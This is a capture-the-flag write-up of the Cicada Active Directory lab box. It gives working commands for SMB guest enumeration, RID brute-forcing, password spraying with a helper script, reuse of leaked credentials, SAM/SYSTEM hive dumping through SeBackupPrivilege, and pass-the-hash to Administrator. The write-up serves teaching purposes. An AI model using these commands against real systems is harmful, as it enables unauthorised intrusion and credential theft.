Cicada

REHAN SAYYED

IP: 10.129.64.6

Let’s start with the nmap scan.

nmap -sC -sV -o nmap 10.129.64.6
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-15 11:12 IST
Nmap scan report for 10.129.64.6
Host is up (0.17s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-05-15 12:43:00Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-05-15T12:43:42
|_  start_date: N/A
|_clock-skew: 6h59m59s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 102.95 seconds

DNS, Kerberos, LDAP (389/636 plus the global catalog on 3268/3269), SMB and WinRM together say Windows domain controller, and the LDAP certificate names it CICADA-DC.cicada.htb. Two details from the scan matter later: SMB signing is required (so NTLM relay is off the table), and the clock skew is almost seven hours, which would break Kerberos authentication. Everything below authenticates with NTLM, so the skew doesn't bite here, but anything Kerberos-based would need the local clock synced to the DC first.

cicada.htb and CICADA-DC.cicada.htb appear throughout the scan, so first map both names to 10.129.64.6 in our hosts file.

sudo nano /etc/hosts

SMB on a domain controller often allows guest access, so let's start by enumerating shares.

nxc smb 10.129.64.6 --shares

nxc reports that the session was deleted for the null session, so instead try a non-existent username with an empty password: if the Guest account is enabled, the server maps that logon to Guest.

nxc smb 10.129.64.6 -u "dignitas" -p "" --shares

Besides the default shares there are two more, DEV and HR, and guest has READ access on HR only.

smbclient -U 'dignitas' //10.129.64.6/HR

The share holds a single file, Notice from HR.txt. Let's pull it down and read it.

mget *.txt

cat Notice\ from\ HR.txt

The notice hands us a default password, Cicada$M6Corpb*@Lp#nZp!8, but no usernames.

Since guest access works, we can cycle RIDs: nxc looks up each candidate SID through LSARPC and the DC translates the ones that exist into account names. --rid-brute walks RIDs up to 4000 by default.

nxc smb 10.129.64.6 -u "dignitas" -p "" --rid-brute

We get a list of accounts. Add the SidTypeUser entries to users.txt and spray the single password across them.

nxc smb 10.129.64.6 -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'
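As an added example (not part of the original write-up), the script below turns raw nxc --rid-brute output into a spray list containing only user accounts, dropping groups and machine accounts, and then emits the spray command. The sample output is constructed to mimic nxc's "RID: DOMAIN\name (SidType)" lines using only names that appear in this write-up; the RIDs are made up. The spray_cmd function only prints the command unless RUN=1 is set.

```shell
#!/bin/sh
# Added example (not from the original write-up): build a spray list from raw
# `nxc smb --rid-brute` output and emit the spray command. The sample output
# below is constructed to mimic nxc's "<RID>: <DOMAIN>\<name> (<SidType>)"
# lines using only names seen in this write-up; the RIDs are made up.

# Keep only user accounts: drop groups/aliases, drop machine accounts
# (names ending in "$"), strip the DOMAIN\ prefix, de-duplicate.
# Caveat: names containing spaces are not captured by the [^ ]+ pattern.
rid_users() {
    sed -nE 's/.*\\([^ ]+) \(SidTypeUser\).*/\1/p' "$1" \
        | grep -v '[$]$' \
        | LC_ALL=C sort -u
}

# Print (or run, with RUN=1) the spray. --continue-on-success keeps nxc going
# after the first hit so every account sharing the password is reported.
# Check the lockout policy first (nxc smb <target> -u <user> -p '' --pass-pol)
# before spraying more than one password per account.
spray_cmd() {  # $1 target, $2 users file, $3 password
    if [ "${RUN:-0}" = "1" ]; then
        nxc smb "$1" -u "$2" -p "$3" --continue-on-success
    else
        printf "nxc smb %s -u %s -p '%s' --continue-on-success\n" "$1" "$2" "$3"
    fi
}

# Constructed sample of nxc rid-brute output (not a real capture).
SAMPLE=$(mktemp)
cat > "$SAMPLE" <<'EOF'
SMB  10.129.64.6  445  CICADA-DC  498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB  10.129.64.6  445  CICADA-DC  500: CICADA\Administrator (SidTypeUser)
SMB  10.129.64.6  445  CICADA-DC  501: CICADA\Guest (SidTypeUser)
SMB  10.129.64.6  445  CICADA-DC  513: CICADA\Domain Users (SidTypeGroup)
SMB  10.129.64.6  445  CICADA-DC  1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB  10.129.64.6  445  CICADA-DC  1104: CICADA\michael.wrightson (SidTypeUser)
SMB  10.129.64.6  445  CICADA-DC  1105: CICADA\david.orelious (SidTypeUser)
SMB  10.129.64.6  445  CICADA-DC  1106: CICADA\emily.oscars (SidTypeUser)
EOF

USERS=$(mktemp)
rid_users "$SAMPLE" > "$USERS"
printf 'spray list:\n'
cat "$USERS"
spray_cmd 10.129.64.6 "$USERS" 'Cicada$M6Corpb*@Lp#nZp!8'
```

Machine accounts are dropped because their passwords are random 120-character strings that no human password will match, and the group entries are not logon accounts at all. Run it once with the real nxc output in place of the sample to get users.txt, then set RUN=1 to spray.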

The password is valid for michael.wrightson. Let’s enumerate and see if this user has access to DEV share.

nxc smb 10.129.64.6 -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --shares

Michael has no share access beyond what guest already had. With a valid domain account, though, we can pull the full user list along with each account's description.

nxc smb 10.129.64.6 -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --users

Eight domain users come back, and the interesting one is david.orelious, whose account description spills his password: aRt$Lp#7t*VQ!3

Let’s now check the access to the DEV Share again.

nxc smb 10.129.64.6 -u david.orelious -p 'aRt$Lp#7t*VQ!3' --shares

Let’s look at the contents inside the DEV share.

smbclient -U 'cicada/david.orelious%aRt$Lp#7t*VQ!3' //10.129.64.6/DEV

The share holds a file named Backup_script.ps1. Let's download it and see what's inside.

mget *.ps1

cat Backup_script.ps1

The script contains the password for emily.oscars, Q!3@Lp#M6b*7t*Vt. Let's see whether the credentials work for WinRM (port 5985 was open in the scan).

nxc winrm 10.129.64.6 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'

Let’s now connect using evil-winrm.

evil-winrm -i 10.129.64.6 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'

Let’s now get our first flag.

type C:\Users\emily.oscars.CICADA\Desktop\user.txt

Flag: 2b8a749011d596957ba7c3159c1ea4a5

Let's now move to root. First, check Emily's group memberships.

net user emily.oscars

Emily is a member of the Backup Operators group.

According to the Microsoft docs, this group:

Members of the Backup Operators group can back up and restore all files on a computer, regardless of the permissions that protect those files. Backup Operators also can log on to and shut down the computer. This group can’t be renamed, deleted, or removed. By default, this built-in group has no members, and it can perform backup and restore operations on domain controllers. Members of the following groups can modify Backup Operators group membership: default service Administrators, Domain Admins in the domain, and Enterprise Admins. Members of the Backup Operators group can’t modify the membership of any administrative groups. Although members of this group can’t change server settings or modify the configuration of the directory, they do have the permissions needed to replace files (including operating system files) on domain controllers. Because members of this group can replace files on domain controllers, they’re considered service administrators.

In practice this shows up as the SeBackupPrivilege and SeRestorePrivilege rights, which let the holder read and write any file regardless of its ACL.

whoami /priv

With SeBackupPrivilege we can save the SAM, SYSTEM and SECURITY hives with reg save and pull them back with evil-winrm's download command. SAM holds the local account hashes and SYSTEM holds the boot key needed to decrypt them; SECURITY (LSA secrets and cached credentials) is saved here but isn't needed for what follows.

reg save hklm\sam sam
reg save hklm\system system
reg save hklm\security security

download sam
download system

Now decrypt the SAM offline using the boot key from SYSTEM.

impacket-secretsdump -sam sam -system system LOCAL

secretsdump prints the Administrator NT hash, which we can pass directly with evil-winrm's -H. One caveat for real engagements: on a domain controller the SAM hive holds the Directory Services Restore Mode (DSRM) administrator, whose password need not match the domain Administrator's, since domain credentials live in NTDS.dit. On this box the hash happens to work for the domain account.

evil-winrm -i 10.129.64.6 -u administrator -H 2b87e7c93a3e8a0ea4a581937016f341

Let’s get our root flag now.

type C:\Users\Administrator\Desktop\root.txt

Flag: 8f272a073990777e7c9a3798de37b2d3

Written by REHAN SAYYED

Passionate cybersecurity enthusiast and red teamer, exploring the depths of offensive security. From secure code reviews to red team operations, I share insights, strategies, and hands-on experiences to help others dive into the world of cyber offense. Join me as I navigate the complexities of cybersecurity on my journey to professional red teaming.